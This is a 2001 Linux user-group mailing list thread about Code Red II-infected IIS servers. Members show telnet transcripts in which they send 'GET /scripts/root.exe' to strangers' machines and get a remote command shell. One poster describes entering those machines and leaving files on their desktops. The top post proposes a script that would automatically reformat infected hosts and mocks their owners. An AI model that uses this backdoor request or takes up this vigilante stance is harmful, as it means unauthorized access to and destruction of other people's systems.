Trying xxx.xxx.xxx.xxx... Connected to xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx). Escape character is '^]'. GET /scripts/root.exe HTTP/1.0 HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 Date: Thu, 23 Aug 2001 22:34:30 GMT Content-Type: application/octet-stream Microsoft Windows 2000 [Version 5.00.2195] (C) Copyright 1985-1999 Microsoft Corp. c:\inetpub\scripts>cd \ -- Then nothing. I reconnected, got the exact same results. The command "DIR" doesnt work either. Perhaps Im grossly misunderstanding something, but it doesnt seem like its actually compromised - nothing will run. I dont think the machine is greatly overloaded either, given how rapidly it responds to an attempt to reconnect. Or perhaps there is some new toolkit out there that is killing processes named root.exe. Its hard to say. That one particular box attempted to install Code Red on my own machine several times. Perhaps someone should write a script that examines logs and then automatically euthanizes any Code Red box with a full reformat. While this may seem harsh, keep in mind said box is currently infecting anything else it can - if people can lose their freedom and property for this "crime", then surely reformatting is a just responce to a device doing so, particularly if it stops said action. If a car was running over children in a parking lot, out of control all "Christine" like, no one would be too upset if someone rolled over it with a tank. Thats what backups are for, right? You did make backups didnt you? If they're using M$ products and arent making backups, they deserve whats coming to them anyways. Fuck 'em if they cant take a joke anyways LOL. Kim Allen wrote: > > I've been contacting the sites that my server logs shows that have been > hitting me with the code red signature and so far no one has bothered to > respond except for one. However that site has told me how secure they are > and how there is no way that they have any problems. When I sent them the > portions of my server logs showing they do have problem they threaten > legal action. Anyone else have had this type of response? > > > To answer your question... make sure you're hitting enter TWICE after > > the command. > > > > As a security guy myself, I'm deeply troubled by what I'm finding. > > Check it out: > > > > [gary@t0psecret /tmp]# telnet xxx.xxx.xxx.xxx 80 > > Trying xxx.xxx.xxx.xxx... > > Connected to xxx.xxx.xxx.xxx. > > Escape character is '^]'. > > GET /scripts/root.exe HTTP/1.0 > > > > HTTP/1.1 200 OK > > Server: Microsoft-IIS/5.0 > > Date: Mon, 06 Aug 2001 04:22:13 GMT > > Content-Type: application/octet-stream > > Microsoft Windows 2000 [Version 5.00.2195] > > (C) Copyright 1985-1999 Microsoft Corp. > > > > c:\inetpub\scripts> > > > > >From here, I've been leaving a nice text file on \\ALL USERS\\ desktop's > > that explains how I did it, and why they need to pay attention to > > security patches. :) > > > > Hopefully they won't take it the 'wrong' way. > > > > ~g~ > > > > On 05 Aug 2001 15:15:02 -0700, Craig White wrote: > > > Wayne Conrad wrote: > > > > > > > > On Sun, 05 August 2001, "J.Francois" wrote: > > > > > I got tired of counting and just started putting the info into my IDS page. > > > > > That way I can send complaints and point them to a URL so I don't have to > > > > > keep recreating the same data each time. > > > > > > > > Are you putting the IP's up too? Every one of the CRII infected boxes is rooted... I wonder about the goodness of publishing a list of known rooted boxes. > > > > Wayne > > > ________________________________________________ > > > > > > I've been trying that out > > > > > > telnet ipaddress_from_my_httpd_access_log 80 > > > > > > GET /scripts/root.exe HTTP/1.0 > > > > > > but I can't get a command prompt - what am I missing? > > > > > > Craig > > > ________________________________________________ > > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > > > > > > ________________________________________________ > > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > > > > ________________________________________________ > See http://PLUG.phoenix.az.us/navigator-mail.shtml if your mail doesn't post to the list quickly and you use Netscape to write mail. > > PLUG-discuss mailing list - PLUG-discuss@lists.PLUG.phoenix.az.us > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss -- jkenner @ mindspring . com__ I Support Linux: _> _ _ |_ _ _ _| Working Together To <__(_||_)| )| `(_|(_)(_| To Build A Better Future. |